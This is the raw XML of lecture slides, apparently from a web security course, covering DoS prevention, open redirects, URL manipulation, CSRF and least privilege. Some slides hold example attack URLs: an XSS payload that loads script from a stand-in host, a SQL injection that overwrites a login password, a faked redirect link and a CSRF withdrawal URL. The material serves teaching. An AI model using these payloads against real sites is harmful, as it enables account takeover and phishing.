              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit ability of systems to send spoofed packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rate controls in upstream distribution nets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use modified TCP connection handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block IP broadcasts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Block suspicious services &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>combinations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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354749333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Preventing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DoS (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage application attacks with “puzzles” to distinguish legitimate human requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good general system security practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use mirrored and replicated servers when high performance and reliability required </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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188835244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Redirect</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="914400"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>redirect: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.vulnerable.com/redirect.asp?=http://www.links.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faked link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.vulnerable.com/security/advisory/23423487829/../../../redirect.asp%3F%3Dhttp%3A//www.facked.com/advisory/system_failure/password_recovery_system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="637167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URL Manipulation Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine a user receives an invitation to view his profile at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.site.com/profile?userid=2249</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accidentally he omits the final "9" and opens: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.site.com/profile?userid=224</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As a result – he opens someone else's profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gaining access to someone's personal information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40957349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URL manipulation?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why would someone manipulate URL?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a web server to deliver web pages he is not supposed to have access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Trigering an exception thus revealing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>information in an error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>message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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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206077" y="4191000"/>
            <a:ext cx="2731847" cy="2127087"/>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56447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Vulnerability Categories</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>typically fall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>implementation level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ugs tend to be easier for attackers to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hardest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> defect category to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>handle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>prevalent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>critical</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5"/>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086600" y="4876800"/>
            <a:ext cx="1409700" cy="146685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83489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URL Manipulation Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Removing any site from Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even when you don’t control it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit in Google Webmaster Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fixed within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Just open the following URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.google.com/webmasters/tools/removals-request?hl=en&amp;siteUrl=http:// {YOUR_URL} /&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>urlt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>= {URL_TO_BLOCK}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="708214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URL Manipulation Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271462" y="4267200"/>
            <a:ext cx="8686800" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html</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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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33400" y="1066800"/>
            <a:ext cx="8162925" cy="2905125"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2786813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URL Manipulation Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL Attack as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://target/getdata.php?data=%3cscript%20src=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=”http://www.badplace.com/nasty.js”&gt;&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack as an SQL Injection </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270n3d%27%3b-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-%00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43777029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Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8686800" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>A.k.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>one-click attack or session riding and abbreviated as CSRF (pronounced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>sea-surf) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>XSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>trusts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>A vulnerable URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Secret cookies and accepting only POST requests does not help</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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36622611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Golden Rule 5. The Principle of the "Weakest Privilege"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Follow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Principle of the "Weakest Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Give no user greater permissions than he needs for performing his job</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94</a:t>
            </a:fld>
